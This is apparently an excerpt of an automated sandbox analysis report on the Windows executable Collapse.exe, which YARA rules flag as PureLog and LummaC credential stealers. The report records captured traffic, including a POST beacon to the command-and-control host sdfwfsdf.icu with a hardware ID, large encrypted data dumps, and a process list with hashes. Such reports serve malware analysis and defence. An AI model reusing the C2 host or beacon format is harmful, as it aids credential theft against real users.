                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 9e 6d e1 9e 9d 88 3b b0 53 1e 61 be c2 bc c6 83 a8 2a 64 e5 cb 9f e3 a4 91 52 08 89 e3 c2 5f c6 e9 fa 27 8e 8b 68 38 c2 b2 73 57 c7 6c 23 08 a3 b5 02 dc 5b c0 e6 ab b1 04 40 70 de 8c 5a a3 2d 08 b0 8b b7 48 f6 f1 c8 df 6b 27 6d b3 d1 31 6b e1 76 66 f5 77 31 94 b4 0d 4c cc f8 90 2e 46 ab 15 91 90 44 6c 65 22 59 c8 d9 9f 7f e3 e4 87 f9 3e 7e 27 1f 8f 8d 32 a3 30 9f 89 33 ce 61 f3 08 c5 65 5b 89 ca 4b 5f 27 35 db 1b 57 15 75 5e ed a0 a2 22 6e 4b 11 fa c2 df 1d c6 7b 02 d8 5f e4 d0 d1 56 e6 94 7e db cf 56 d2 93 5d 32 f7 cd 55 26 cf f5 e4 92 3b 2a 39 1f 8f e9 d2 48 be 5b a2 9b 6f 0e 74 28 ea 29 e1 13 eb d3 14 ec 30 84 fb df 6a 51 61 d5 17 f1 1e 03 d4 eb 3e 6a cb f0 d7 f6 a3 08 cf d9 d4 44 5a 4f e3 56 fd be 49 88 00 2b a6 c3 a8 30 ca c6 dc 58 dd 1e 58 69 5e 9c
                                          Data Ascii: m;Sa*dR_'h8sWl#[@pZ-Hk'm1kvfw1L.FDle"Y>~'203ae[K_'5Wu^"nK{_V~V]2U&;*9H[ot()0jQa>jDZOVI+0XXi^
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 01 b5 24 89 5a 2d 06 6e ec b4 cb a9 f7 f2 6a e0 19 93 1d ba 18 f0 bc 53 4c 3e a7 7a 9a e3 f6 a4 b9 f8 08 e7 c6 f7 58 29 78 2f eb 40 6a 8c 04 c0 77 e0 18 38 02 be 1b 05 cb 6e 7d d1 fe d2 c2 cb 74 a6 11 d1 e5 ce 16 97 2c 50 b0 6e 6c a7 70 4b 9e e6 31 60 69 91 dd 50 af b2 16 92 dc 82 24 96 a3 54 7b dc 90 5a ca 4a 7d 54 75 96 aa bc d0 fd 45 17 04 a9 92 03 b6 24 c0 87 75 33 41 43 99 a9 57 c5 7c 79 98 c5 cc e3 d1 1b a7 de 60 af 0c 35 a0 75 b7 e8 21 fd 3d 26 f9 e7 4a 34 93 e0 08 29 d0 db 80 07 c4 7c 80 12 af 3e 40 57 a2 29 25 9b 28 de d4 66 ee 8d 32 12 04 ab f6 6e f5 76 48 96 e0 16 85 d8 60 6c 1e be 63 6b d7 ac 19 2b 55 d4 b5 c0 0c 05 97 27 ef a0 a6 f7 35 2f 89 48 85 4d aa 11 67 44 ae a0 64 34 88 01 d0 5d 3b 6f ff 59 1e 76 5a 6d de 0a ba 3b 11 b7 29 36 3d 65 80
                                          Data Ascii: $Z-njSL>zX)x/@jw8n}t,PnlpK1`iP$T{ZJ}TuE$u3ACW|y`5u!=&J4)|>@W)%(f2nvH`lck+U'5/HMgDd4];oYvZm;)6=e
                                          2025-03-05 13:57:36 UTC808INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:36 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYkjhrcV9FldGem2px4NhuH0l6sxBfvUVlkms0xkBurJQuHNuL9oPGYiuvXIVDEpw1VjlTXz06LvMgGTgIaCzNR93PQvtXClR3tkCaZPJCG5mRjIWcZLxGW1BbK4Hsg%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f86b9ef42e2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1727&rtt_var=656&sent=196&recv=588&lost=0&retrans=0&sent_bytes=2827&recv_bytes=573027&delivery_rate=1656267&cwnd=188&unsent_bytes=0&cid=3c6b59557e06f595&ts=2904&x=0"


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.549728188.114.97.34437096C:\Users\user\Desktop\Collapse.exe
                                          TimestampBytes transferredDirectionData
                                          2025-03-05 13:57:37 UTC260OUTPOST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 89
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:37 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 26 6a 3d 26 68 77 69 64 3d 44 45 32 37 34 42 33 45 30 37 46 36 34 38 38 36 37 39 45 32 39 30 35 35 33 30 32 43 37 31 37 43
                                          Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--qnhtzqcrazyg&j=&hwid=DE274B3E07F6488679E29055302C717C
                                          2025-03-05 13:57:39 UTC809INHTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24Fy7OiJ%2BXIu%2BruwhfEcgeShL8HLiNvBbPrdvuUmeEov1exp8kKT2bTCHbUHPpS8bNpbbpfn5NU3ye3b%2FWQBB8CUGfHTKzlKTTco3iHSjgp3HwdHcB0YJQgbF%2F9nsTM%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f9c2d17c461-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1507&rtt_var=589&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=985&delivery_rate=1820448&cwnd=236&unsent_bytes=0&cid=059d5b6a0ff8aa0b&ts=2057&x=0"
                                          2025-03-05 13:57:39 UTC560INData Raw: 31 39 32 33 0d 0a 55 4c 53 62 46 6a 5a 6d 42 6c 74 46 74 44 4b 79 68 75 4e 32 33 39 37 36 30 35 42 53 32 51 79 43 2f 38 43 65 75 79 61 73 54 32 51 4c 7a 37 6c 77 51 6b 51 38 61 6d 6d 57 56 35 43 38 30 6c 72 39 75 74 6a 70 73 67 37 32 54 65 6d 58 73 4f 54 4e 55 2b 63 4e 4e 68 2f 66 36 48 78 31 56 57 77 44 43 74 70 63 79 4d 4b 62 4e 2b 69 74 6c 62 6a 53 49 75 70 2f 75 70 36 61 71 49 78 6b 35 44 6f 7a 4b 4f 47 71 65 31 67 70 63 32 38 71 38 6e 66 44 31 5a 6f 37 6b 37 75 30 73 4b 59 33 76 30 48 53 75 6f 54 72 77 6b 2f 39 43 41 6b 31 7a 75 4e 6d 57 42 52 31 48 69 43 42 56 4d 58 4d 71 68 65 38 36 63 32 36 39 77 65 4e 66 4d 36 32 74 2b 71 50 46 39 59 2f 55 57 6a 44 6f 30 64 35 55 55 30 52 42 4e 56 57 68 64 61 6b 47 37 6d 4a 6a 59 47 6e 50 75 46 6b 34 35 32 78 79
                                          Data Ascii: 1923ULSbFjZmBltFtDKyhuN2397605BS2QyC/8CeuyasT2QLz7lwQkQ8ammWV5C80lr9utjpsg72TemXsOTNU+cNNh/f6Hx1VWwDCtpcyMKbN+itlbjSIup/up6aqIxk5DozKOGqe1gpc28q8nfD1Zo7k7u0sKY3v0HSuoTrwk/9CAk1zuNmWBR1HiCBVMXMqhe86c269weNfM62t+qPF9Y/UWjDo0d5UU0RBNVWhdakG7mJjYGnPuFk452xy
                                          2025-03-05 13:57:39 UTC1369INData Raw: 34 67 67 61 4e 68 44 6a 64 4a 62 41 37 2b 63 39 50 52 6d 51 4b 59 73 35 2b 41 35 77 44 75 59 4e 37 51 67 66 58 54 56 74 59 35 45 52 76 32 79 56 6c 64 46 57 77 59 64 74 35 71 2f 65 69 4e 44 4a 75 6d 75 2b 54 6a 50 62 4a 4f 38 73 79 76 70 74 70 38 38 47 41 47 45 76 7a 75 54 67 34 6c 56 52 77 72 2b 78 6d 47 36 61 55 7a 36 59 32 44 6e 74 77 33 6c 32 2b 30 6d 71 62 54 36 32 50 6f 4f 68 30 35 35 64 78 34 55 78 78 2b 4b 79 76 47 51 66 66 6a 31 68 43 6f 6c 4c 4f 79 38 32 58 75 5a 65 57 71 6c 4f 37 33 62 39 73 37 55 47 48 4f 36 79 4e 76 55 6b 73 4b 43 6f 5a 35 2b 4d 65 43 45 75 69 4f 76 62 37 31 4a 36 35 65 74 5a 4f 63 73 66 70 4e 78 44 38 65 4a 73 48 51 56 47 51 70 62 53 67 76 39 77 48 59 33 71 77 59 73 35 58 4a 76 4d 67 7a 67 47 50 70 76 62 44 59 67 32 66 4e 46
                                          Data Ascii: 4ggaNhDjdJbA7+c9PRmQKYs5+A5wDuYN7QgfXTVtY5ERv2yVldFWwYdt5q/eiNDJumu+TjPbJO8syvptp88GAGEvzuTg4lVRwr+xmG6aUz6Y2Dntw3l2+0mqbT62PoOh055dx4Uxx+KyvGQffj1hColLOy82XuZeWqlO73b9s7UGHO6yNvUksKCoZ5+MeCEuiOvb71J65etZOcsfpNxD8eJsHQVGQpbSgv9wHY3qwYs5XJvMgzgGPpvbDYg2fNF
                                          2025-03-05 13:57:39 UTC1369INData Raw: 53 59 55 4a 53 4e 79 45 31 67 51 72 46 76 72 49 35 36 4a 57 77 6b 76 45 32 37 6c 7a 46 6b 71 58 72 7a 48 53 62 49 78 55 47 78 4b 6b 75 56 41 46 46 45 67 2f 58 53 38 62 7a 69 54 4c 76 76 4c 76 34 2f 6a 79 6a 53 4c 75 5a 71 50 44 56 46 65 34 45 56 79 53 66 79 55 56 41 55 57 38 54 4d 2b 46 71 39 62 61 46 4e 49 65 48 6b 70 7a 66 4f 5a 35 43 31 72 4b 4d 2b 2f 56 46 6d 69 6f 69 49 2f 32 73 4a 45 34 6f 4e 7a 34 6b 6e 30 50 39 33 71 45 59 69 72 71 72 6f 75 67 6b 72 6c 62 79 75 4b 4f 75 32 6b 6e 50 47 6a 41 67 2f 2f 4a 73 54 79 4e 68 62 7a 65 46 43 6f 4b 32 71 7a 6e 72 70 35 69 4a 38 54 62 75 58 4f 6e 4a 69 4c 58 72 51 64 6b 37 56 79 66 66 34 31 39 41 45 47 34 70 44 38 78 39 32 66 57 4c 4f 70 65 38 67 2b 58 6c 50 4c 4e 31 7a 35 58 34 37 63 4e 6c 39 67 64 55 4e 50
                                          Data Ascii: SYUJSNyE1gQrFvrI56JWwkvE27lzFkqXrzHSbIxUGxKkuVAFFEg/XS8bziTLvvLv4/jyjSLuZqPDVFe4EVySfyUVAUW8TM+Fq9baFNIeHkpzfOZ5C1rKM+/VFmioiI/2sJE4oNz4kn0P93qEYirqrougkrlbyuKOu2knPGjAg//JsTyNhbzeFCoK2qznrp5iJ8TbuXOnJiLXrQdk7Vyff419AEG4pD8x92fWLOpe8g+XlPLN1z5X47cNl9gdUNP
                                          2025-03-05 13:57:39 UTC1369INData Raw: 48 44 51 4e 48 50 6b 42 78 4c 36 69 4e 49 32 45 74 70 72 42 41 4c 59 35 37 4a 79 7a 37 2f 41 4e 6d 7a 67 68 59 59 66 66 5a 46 49 73 54 57 6b 77 7a 56 75 48 31 4b 55 69 6b 62 79 33 74 4f 41 6f 72 33 6e 49 7a 6f 66 62 2f 42 37 34 49 6a 49 49 32 75 70 36 57 43 6c 42 48 77 7a 58 58 4f 48 38 30 53 36 57 69 72 6d 48 34 68 65 38 50 37 61 39 72 39 72 63 61 64 77 41 4d 68 4c 77 77 79 41 4f 50 6d 74 73 43 74 5a 67 31 66 57 6e 51 76 53 50 69 4a 2f 35 50 36 78 6d 30 37 69 73 78 75 74 36 67 77 6b 31 50 39 43 75 63 77 4d 48 63 6a 67 6d 33 32 36 64 37 4b 5a 50 75 61 79 41 68 66 49 58 69 33 53 30 31 4c 66 73 79 31 7a 49 48 6c 5a 67 67 2f 70 63 64 77 64 69 48 41 36 45 66 59 54 76 31 69 53 59 75 62 36 53 38 51 57 6f 62 73 75 61 6c 4f 37 38 62 75 73 74 48 6a 32 66 38 57 5a
                                          Data Ascii: HDQNHPkBxL6iNI2EtprBALY57Jyz7/ANmzghYYffZFIsTWkwzVuH1KUikby3tOAor3nIzofb/B74IjII2up6WClBHwzXXOH80S6WirmH4he8P7a9r9rcadwAMhLwwyAOPmtsCtZg1fWnQvSPiJ/5P6xm07isxut6gwk1P9CucwMHcjgm326d7KZPuayAhfIXi3S01Lfsy1zIHlZgg/pcdwdiHA6EfYTv1iSYub6S8QWobsualO78bustHj2f8WZ
                                          2025-03-05 13:57:39 UTC1369INData Raw: 68 48 68 52 4f 50 30 6b 67 36 78 36 4a 36 55 33 77 6a 75 52 39 47 72 39 2f 33 61 55 4e 38 5a 54 77 69 4e 34 55 46 61 48 6d 67 2b 41 63 78 44 79 74 57 74 4d 37 36 35 67 37 7a 47 48 62 64 38 35 36 32 55 72 49 6c 52 77 43 6c 63 50 5a 2f 52 57 32 5a 56 58 69 6f 2f 2f 47 61 5a 77 39 41 75 76 4b 53 62 75 50 59 6d 72 30 50 30 75 70 54 7a 36 56 37 69 66 52 59 33 68 66 46 47 51 43 6c 48 50 68 44 34 41 6f 54 75 31 54 4f 33 6b 5a 4b 72 38 32 4f 72 50 38 2f 4f 6d 75 37 76 5a 4d 51 6f 48 54 66 5a 2b 6c 39 45 49 30 77 77 49 2b 59 43 2b 4c 4f 4e 42 4b 79 62 6e 2b 62 49 4e 72 56 4f 34 38 65 42 37 64 78 52 2f 51 41 6f 49 76 7a 2f 54 41 55 71 56 32 49 6b 78 32 50 32 74 71 5a 43 70 70 2b 55 76 2b 6b 58 72 6d 44 37 78 35 4c 50 7a 6b 44 77 59 46 78 6b 77 4b 31 42 56 54 64 55
                                          Data Ascii: hHhROP0kg6x6J6U3wjuR9Gr9/3aUN8ZTwiN4UFaHmg+AcxDytWtM765g7zGHbd8562UrIlRwClcPZ/RW2ZVXio//GaZw9AuvKSbuPYmr0P0upTz6V7ifRY3hfFGQClHPhD4AoTu1TO3kZKr82OrP8/Omu7vZMQoHTfZ+l9EI0wwI+YC+LONBKybn+bINrVO48eB7dxR/QAoIvz/TAUqV2Ikx2P2tqZCpp+Uv+kXrmD7x5LPzkDwYFxkwK1BVTdU
                                          2025-03-05 13:57:39 UTC407INData Raw: 54 34 30 34 5a 42 6d 72 75 67 76 63 49 37 72 45 72 74 79 62 6a 56 31 6b 4f 56 65 79 34 64 31 66 4d 39 66 41 39 6a 4d 53 50 6f 48 65 44 49 72 54 32 70 73 4b 6e 68 31 69 69 4c 50 76 57 76 39 39 58 33 62 4f 34 70 46 68 6a 59 37 48 39 62 4d 6b 77 33 45 65 67 64 38 2b 32 4c 4f 72 47 43 31 5a 6a 61 47 65 6c 57 36 59 79 71 33 65 46 68 2f 41 41 4b 50 73 79 69 62 48 64 52 64 54 51 30 77 41 75 43 34 71 41 54 68 65 6a 4e 6b 64 67 6e 6a 31 43 74 68 59 50 4c 30 41 33 45 44 42 5a 68 78 74 70 45 63 68 56 6b 43 53 4c 41 65 63 4b 2b 75 6a 65 4b 76 37 33 71 38 51 47 78 65 71 6d 75 72 50 43 50 58 2b 6b 44 43 51 79 62 72 79 4a 54 46 45 6b 49 41 4e 31 35 78 50 57 31 58 59 69 31 69 70 57 6a 48 62 45 6e 37 5a 65 36 31 75 74 6f 7a 6e 34 4c 41 50 7a 43 59 6e 30 66 52 41 73 31 7a
                                          Data Ascii: T404ZBmrugvcI7rErtybjV1kOVey4d1fM9fA9jMSPoHeDIrT2psKnh1iiLPvWv99X3bO4pFhjY7H9bMkw3Eegd8+2LOrGC1ZjaGelW6Yyq3eFh/AAKPsyibHdRdTQ0wAuC4qAThejNkdgnj1CthYPL0A3EDBZhxtpEchVkCSLAecK+ujeKv73q8QGxeqmurPCPX+kDCQybryJTFEkIAN15xPW1XYi1ipWjHbEn7Ze61utozn4LAPzCYn0fRAs1z
                                          2025-03-05 13:57:39 UTC1369INData Raw: 31 64 36 31 0d 0a 4e 30 33 48 6b 42 31 51 38 37 71 39 53 59 77 31 43 63 48 44 38 57 2b 4c 65 30 68 4c 76 69 37 79 38 6f 57 43 51 57 4f 69 50 67 76 54 75 58 4f 39 38 44 67 6a 37 39 57 41 4f 55 47 39 76 45 74 74 61 32 65 36 4f 49 59 32 43 31 62 6a 39 46 4a 45 34 73 4b 57 51 79 2f 6c 57 7a 69 67 63 42 2f 72 38 62 6e 74 58 64 43 77 32 68 56 48 62 30 71 45 65 75 4f 37 4d 6e 75 4d 46 34 47 37 56 6b 70 72 39 33 51 33 2f 46 6a 45 46 2b 50 35 7a 57 44 6f 70 49 77 71 43 57 34 66 56 6c 78 53 74 72 61 44 69 7a 48 32 75 57 73 7a 47 69 50 61 4a 59 4e 55 73 45 52 33 52 7a 57 39 71 53 57 6f 33 43 76 78 43 31 39 53 37 52 4b 65 59 6c 4c 66 32 4e 4c 78 62 7a 70 69 31 36 6f 35 44 6e 69 59 70 4e 50 58 30 4c 6b 55 65 58 7a 67 41 6a 58 33 75 71 61 59 69 6c 49 61 73 76 36 63 68
                                          Data Ascii: 1d61N03HkB1Q87q9SYw1CcHD8W+Le0hLvi7y8oWCQWOiPgvTuXO98Dgj79WAOUG9vEtta2e6OIY2C1bj9FJE4sKWQy/lWzigcB/r8bntXdCw2hVHb0qEeuO7MnuMF4G7Vkpr93Q3/FjEF+P5zWDopIwqCW4fVlxStraDizH2uWszGiPaJYNUsER3RzW9qSWo3CvxC19S7RKeYlLf2NLxbzpi16o5DniYpNPX0LkUeXzgAjX3uqaYilIasv6ch
                                          2025-03-05 13:57:39 UTC1369INData Raw: 43 72 79 34 35 38 68 79 6f 38 4e 2b 37 66 58 6c 51 31 56 57 6b 56 2f 6b 69 44 77 6f 67 51 72 5a 75 62 34 4f 59 31 6f 47 66 6e 75 50 57 71 7a 32 66 2b 4e 51 38 57 37 4b 70 6c 52 79 39 38 63 44 58 6a 42 50 43 2f 70 67 58 6d 37 38 71 77 39 68 65 75 56 72 71 51 72 36 37 76 55 2b 67 42 48 41 6a 67 7a 55 4a 58 4a 57 6b 76 44 63 46 71 69 75 2b 58 41 4c 43 4b 6c 6f 66 53 61 37 49 36 30 59 61 4e 72 66 6c 46 7a 33 6b 42 44 4a 76 68 65 31 6b 6e 55 54 4e 33 35 58 58 63 34 37 63 34 74 65 71 44 6c 74 77 35 68 53 4f 32 79 5a 6a 6e 2f 47 4f 62 65 41 30 34 7a 63 70 50 42 79 74 78 4c 33 47 46 53 4d 4b 78 30 45 47 72 6e 39 48 6b 33 42 6a 75 52 4f 53 4e 6a 50 7a 2b 44 63 51 72 43 44 66 57 2b 45 4e 2b 48 6b 77 57 43 64 39 34 68 2b 53 78 48 61 79 30 75 59 61 6a 59 36 46 45 32
                                          Data Ascii: Cry458hyo8N+7fXlQ1VWkV/kiDwogQrZub4OY1oGfnuPWqz2f+NQ8W7KplRy98cDXjBPC/pgXm78qw9heuVrqQr67vU+gBHAjgzUJXJWkvDcFqiu+XALCKlofSa7I60YaNrflFz3kBDJvhe1knUTN35XXc47c4teqDltw5hSO2yZjn/GObeA04zcpPBytxL3GFSMKx0EGrn9Hk3BjuROSNjPz+DcQrCDfW+EN+HkwWCd94h+SxHay0uYajY6FE2
                                          2025-03-05 13:57:39 UTC1369INData Raw: 68 53 65 73 46 56 44 62 38 39 55 52 67 4c 7a 63 73 64 65 4e 36 34 39 43 58 4e 4b 36 4c 6a 5a 44 42 5a 4c 78 42 79 4d 61 50 39 63 4e 31 6d 79 4d 53 46 4d 58 49 64 41 52 56 66 68 49 68 35 31 37 41 78 4e 63 2f 72 62 4b 49 34 63 63 71 75 6a 7a 76 73 5a 6a 35 36 6d 6e 70 4f 51 38 54 34 65 6c 58 5a 69 56 4c 45 69 4c 57 58 63 76 71 70 68 47 50 69 59 76 68 32 52 7a 70 5a 65 6d 49 75 50 75 4b 56 4a 55 32 4b 44 75 47 30 6c 78 54 4a 45 64 76 46 70 39 6a 2b 4e 57 51 4e 2b 65 58 6a 62 72 53 4a 37 4e 48 31 36 79 42 70 39 70 55 39 53 68 58 41 2f 2f 34 59 58 77 78 5a 7a 68 79 67 31 6e 64 30 36 38 73 6b 2b 75 4e 6f 71 68 6a 6f 33 79 32 6d 72 65 6f 32 47 6d 66 4c 69 30 6e 31 66 38 68 5a 6a 4a 72 50 52 6d 62 52 65 54 30 6a 77 53 4f 73 70 69 6a 6f 52 36 73 53 39 43 75 6c 2f
                                          Data Ascii: hSesFVDb89URgLzcsdeN649CXNK6LjZDBZLxByMaP9cN1myMSFMXIdARVfhIh517AxNc/rbKI4ccqujzvsZj56mnpOQ8T4elXZiVLEiLWXcvqphGPiYvh2RzpZemIuPuKVJU2KDuG0lxTJEdvFp9j+NWQN+eXjbrSJ7NH16yBp9pU9ShXA//4YXwxZzhyg1nd068sk+uNoqhjo3y2mreo2GmfLi0n1f8hZjJrPRmbReT0jwSOspijoR6sS9Cul/


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:08:57:17
                                          Start date:05/03/2025
                                          Path:C:\Users\user\Desktop\Collapse.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Collapse.exe"
                                          Imagebase:0xf40000
                                          File size:425'984 bytes
                                          MD5 hash:04EACC602D626EBA16224FDC15EF8AA5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:08:57:17
                                          Start date:05/03/2025
                                          Path:C:\Users\user\Desktop\Collapse.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Collapse.exe"
                                          Imagebase:0xf50000
                                          File size:425'984 bytes
                                          MD5 hash:04EACC602D626EBA16224FDC15EF8AA5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:4
                                          Start time:08:57:17
                                          Start date:05/03/2025
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924
                                          Imagebase:0xa50000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >